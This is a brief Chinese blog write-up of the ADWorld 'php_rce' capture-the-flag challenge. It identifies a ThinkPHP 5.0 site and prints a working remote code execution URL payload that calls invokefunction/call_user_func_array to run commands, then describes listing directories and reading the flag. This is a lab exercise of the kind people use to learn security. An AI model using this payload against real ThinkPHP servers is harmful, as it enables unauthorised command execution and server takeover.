ADWORLD web/php_rce

进入链接:

 

 thinkphp v5是一个php框架,在github 上搜索,得到如下版本

 

 随便选一个输入到url中,连接返回:

 

 说明版本是5.0.2,根据5.0.21版本构造payload,得到如下

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=id

 

 继续,ls查看目录,无异常

 

 继续,访问上级目录,在第三层发现flag的身影:

 

 用cat访问flag

 

 

 

https://blog.csdn.net/phpergod/article/details/92841998

https://blog.csdn.net/Mr_helloword/article/details/107924218

posted @ 2020-10-08 19:34  EleclouD  阅读(123)  评论(0编辑  收藏  举报